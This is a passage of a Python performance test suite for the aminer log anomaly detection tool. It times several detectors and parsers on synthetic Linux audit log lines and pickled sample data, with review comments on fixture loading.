b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 
a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 
fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 ' b'a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 ' b'tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), 
FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: r = random.randint(0, len(log_lines)-1) line = log_lines[r] log_atom = LogAtom( line, ParserMatch(parsing_model.get_match_element('parser', MatchContext(line))), t + i, self.__class__.__name__) measured_time += timeit.timeit(lambda: new_match_id_value_combo_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = 
avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_id_value_combo_detector.__class__.__name__, avg, results, '%.2f seconds min_allowed_time_diff.' % min_allowed_time_diff) def run_parser_count(self, set_path_list, report_after_number_of_elements): """Run the performance tests for ParserCount.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00' b' nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 
fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): 
arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 ' b'a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 ' b'tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), 
DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: if set_path_list: parser_count = ParserCount(self.aminer_config, ['parser/type/path/name', 'parser/type/syscall/syscall'], [ self.stream_printer_event_handler], report_after_number_of_elements) else: parser_count = ParserCount(self.aminer_config, None, [self.stream_printer_event_handler], report_after_number_of_elements) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: r = random.randint(0, len(log_lines) - 1) line = log_lines[r] log_atom = LogAtom(line, ParserMatch(parsing_model.get_match_element('parser', MatchContext(line))), t + i, self.__class__.__name__) measured_time += 
timeit.timeit(lambda: parser_count.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( parser_count.__class__.__name__, avg, results, 'set_path_list: %s, report_after_number_of_elements: %d' % (set_path_list, report_after_number_of_elements)) def run_event_correlation_detector(self, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis): """Run the performance tests for EventCorrelationDetector.""" alphabet = b'abcdefghijklmnopqrstuvwxyz' children = [] for i, char in enumerate(alphabet): char = bytes([char]) children.append(FixedDataModelElement(char.decode(), char)) alphabet_model = FirstMatchModelElement('first', children) # training phase results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], generation_factor=generation, generation_probability=generation, max_hypotheses=max_hypotheses, max_observations=max_observations, p0=p0, alpha=alpha, candidates_size=candidates_size, hypotheses_eval_delta_time=hypothesis_eval_delta_time, delta_time_to_discard_hypothesis=delta_time_to_discard_hypothesis) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: char = bytes([alphabet[i % len(alphabet)]]) parser_match = ParserMatch(alphabet_model.get_match_element('parser', MatchContext(char))) t += diff measured_time += timeit.timeit(lambda: ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( ecd.__class__.__name__, avg, results, 'learn_mode: %s, generation: %.2f, diff: %.2f, p0: %.2f, alpha: %.2f, max_hypothesis: %d, max_observations: %d, candid' 
'ates_size %d, hypothesis_eval_delta_time: %.2f, delta_time_to_discard_hypothesis: %.2f' % ( ecd.learn_mode, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis)) # check_phase results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: ecd.learn_mode = False t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: char = bytes([alphabet[i % len(alphabet)]]) parser_match = ParserMatch(alphabet_model.get_match_element('parser', MatchContext(char))) t += diff measured_time += timeit.timeit(lambda: ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( ecd.__class__.__name__, avg, results, 'learn_mode: %s, generation: %.2f, diff: %.2f, p0: %.2f, alpha: %.2f, max_hypothesis: %d, max_observations: %d, candid' 'ates_size %d, hypothesis_eval_delta_time: %.2f, delta_time_to_discard_hypothesis: %.2f' % ( ecd.learn_mode, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis)) def run_match_filter(self, number_of_paths): """Run the performance tests for MatchFilter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) match_filter = MatchFilter(self.aminer_config, ['d' + str(i) for i in range(number_of_paths)], [ self.stream_printer_event_handler]) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r 
= random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, match_filter) measured_time += timeit.timeit(lambda: match_filter.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( match_filter.__class__.__name__, avg, results, 'a %s and %d different path(s).' % (new_match_path_detector.__class__.__name__, number_of_paths)) def run_event_type_detector(self, number_of_paths): """Run the performance tests for EventTypeDetector.""" with open('unit/data/vtd_data/uni_data_test6', 'rb') as f: uni_data_list = pickle.load(f) with open('unit/data/vtd_data/nor_data_test6', 'rb') as f: nor_data_list = pickle.load(f) with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f: beta1_data_list = pickle.load(f) with open('unit/data/vtd_data/uni_data_test7', 'rb') as f: [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/nor_data_test7', 'rb') as f: [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f: [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f: [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f: [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f: [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f) with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f: [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f) data = uni_data_list + nor_data_list + beta1_data_list + 
uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\ nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\ + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: path_list = None if number_of_paths is not None and number_of_paths != 1000000: path_list = ['/integer/d' + str(i) for i in range(number_of_paths)] else: number_of_paths = 1000000 event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths)) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(data[i % len(data)]).encode()) match_element = any_byte_data_me.get_match_element('/integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector) measured_time += timeit.timeit(lambda: event_type_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations if number_of_paths == 1000000: number_of_paths = 'all' type(self).result = self.result + self.result_string % ( event_type_detector.__class__.__name__, avg, results, '%s different path(s).' 
% (str(number_of_paths)))

    def run_variable_type_detector(self, number_of_paths):
        """
        Run the performance tests for VariableTypeDetector.

        Feeds pre-generated sample values (uniform / normal / beta distributions, pickled under unit/data/vtd_data) through an
        EventTypeDetector and a VariableTypeDetector and records how many atoms per second the VTD handles.

        @param number_of_paths number of distinct parser paths to generate; None or 1000000 means "all paths, no restriction"
        (the parameter is reassigned to 1000000 and finally to the string 'all' for the report).
        """
        # NOTE(review): pickle.load() can execute arbitrary code while deserializing. These are repo-local test fixtures, which
        # is acceptable here, but this pattern must never be used on data that is not part of the checked-in test suite.
        with open('unit/data/vtd_data/uni_data_test6', 'rb') as f:
            uni_data_list = pickle.load(f)
        with open('unit/data/vtd_data/nor_data_test6', 'rb') as f:
            nor_data_list = pickle.load(f)
        with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f:
            beta1_data_list = pickle.load(f)
        # The *_test7 fixtures hold four lists each; only the initial and update lists are used here.
        with open('unit/data/vtd_data/uni_data_test7', 'rb') as f:
            [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/nor_data_test7', 'rb') as f:
            [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f:
            [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f:
            [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f:
            [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f:
            [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f:
            [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f)
        data = uni_data_list + nor_data_list + beta1_data_list + uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\
            nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\
            + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            path_list = None
            if number_of_paths is not None and number_of_paths != 1000000:
                path_list = ['/integer/d' + str(i) for i in range(number_of_paths)]
            else:
                # Sentinel meaning "unrestricted": keeps the modulo below well-defined when the caller passed None.
                number_of_paths = 1000000
            event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list)
            variable_type_detector = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], event_type_detector, target_path_list=path_list)
            seconds = time.time()
            i = 0
            measured_time = 0
            # Each iteration runs until waiting_time / 10 seconds of detector time were consumed; the atom count is then scaled
            # by 10 to report atoms per waiting_time.
            while measured_time < self.waiting_time / 10:
                any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths))
                p = process_time()
                r = random.randint(1, 1000000)
                # Exclude the cost of drawing the random offset from the synthetic clock.
                seconds = seconds + process_time() - p
                match_context = MatchContext(str(data[i % len(data)]).encode())
                match_element = any_byte_data_me.get_match_element('/integer', match_context)
                # Random, non-monotonic timestamps are intentional test input here, not a realistic log stream.
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector)
                # The ETD must accept the atom first, otherwise the VTD has no event type to work on.
                self.assertTrue(event_type_detector.receive_atom(log_atom))
                measured_time += timeit.timeit(lambda: variable_type_detector.receive_atom(log_atom), number=1)
                i = i + 1
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        if number_of_paths == 1000000:
            number_of_paths = 'all'
        # Results are accumulated on the class so tearDownClass can print them once for all tests.
        type(self).result = self.result + self.result_string % (
            variable_type_detector.__class__.__name__, avg, results, '%s different path(s).'
            % (str(number_of_paths)))

    def run_variable_correlation_detector(self, number_of_paths):
        """
        Run the performance tests for VariableCorrelationDetector.

        Same fixture loading and atom generation as run_variable_type_detector; the measured component is the VCD, which is fed
        through an EventTypeDetector that is itself restricted to the generated path list.

        @param number_of_paths number of distinct parser paths to generate; None or 1000000 means "all paths" (see note in
        test21 on why the unrestricted case is not exercised).
        """
        # NOTE(review): pickle.load() can execute arbitrary code while deserializing; acceptable only because these are
        # checked-in test fixtures.
        with open('unit/data/vtd_data/uni_data_test6', 'rb') as f:
            uni_data_list = pickle.load(f)
        with open('unit/data/vtd_data/nor_data_test6', 'rb') as f:
            nor_data_list = pickle.load(f)
        with open('unit/data/vtd_data/beta1_data_test6', 'rb') as f:
            beta1_data_list = pickle.load(f)
        with open('unit/data/vtd_data/uni_data_test7', 'rb') as f:
            [uni_data_list_ini, uni_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/nor_data_test7', 'rb') as f:
            [nor_data_list_ini, nor_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta1_data_test7', 'rb') as f:
            [beta1_data_list_ini, beta1_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta2_data_test7', 'rb') as f:
            [beta2_data_list_ini, beta2_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta3_data_test7', 'rb') as f:
            [beta3_data_list_ini, beta3_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta4_data_test7', 'rb') as f:
            [beta4_data_list_ini, beta4_data_list_upd, _, _] = pickle.load(f)
        with open('unit/data/vtd_data/beta5_data_test7', 'rb') as f:
            [beta5_data_list_ini, beta5_data_list_upd, _, _] = pickle.load(f)
        data = uni_data_list + nor_data_list + beta1_data_list + uni_data_list_ini + uni_data_list_upd + nor_data_list_ini +\
            nor_data_list_upd + beta1_data_list_ini + beta1_data_list_upd + beta2_data_list_ini + beta2_data_list_upd + beta3_data_list_ini\
            + beta3_data_list_upd + beta4_data_list_ini + beta4_data_list_upd + beta5_data_list_ini + beta5_data_list_upd
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            path_list = None
            if number_of_paths is not None and number_of_paths != 1000000:
                path_list = ['/integer/d' + str(i) for i in range(number_of_paths)]
            else:
                number_of_paths = 1000000
            event_type_detector = EventTypeDetector(self.aminer_config,
                                                    [self.stream_printer_event_handler], target_path_list=path_list)
            # The VCD takes no path list of its own; the restriction comes via the ETD.
            variable_correlation_detector = VariableCorrelationDetector(
                self.aminer_config, [self.stream_printer_event_handler], event_type_detector)
            seconds = time.time()
            i = 0
            measured_time = 0
            while measured_time < self.waiting_time / 10:
                any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths))
                p = process_time()
                r = random.randint(1, 1000000)
                seconds = seconds + process_time() - p
                match_context = MatchContext(str(data[i % len(data)]).encode())
                match_element = any_byte_data_me.get_match_element('/integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector)
                self.assertTrue(event_type_detector.receive_atom(log_atom))
                measured_time += timeit.timeit(lambda: variable_correlation_detector.receive_atom(log_atom), number=1)
                i = i + 1
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        if number_of_paths == 1000000:
            number_of_paths = 'all'
        type(self).result = self.result + self.result_string % (
            variable_correlation_detector.__class__.__name__, avg, results, '%s different path(s).'
% (str(number_of_paths)))

    def run_event_frequency_detector(self, number_of_paths):
        """
        Run the performance tests for EventFrequencyDetector.

        @param number_of_paths number of distinct parser paths to cycle through; None generates a new path for every atom
        and leaves the detector's target_path_list unset.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            # Only instantiated so its class name can appear in the report string below; it receives no atoms.
            new_match_path_detector = NewMatchPathDetector(self.aminer_config, [
                self.stream_printer_event_handler], 'Default', True)
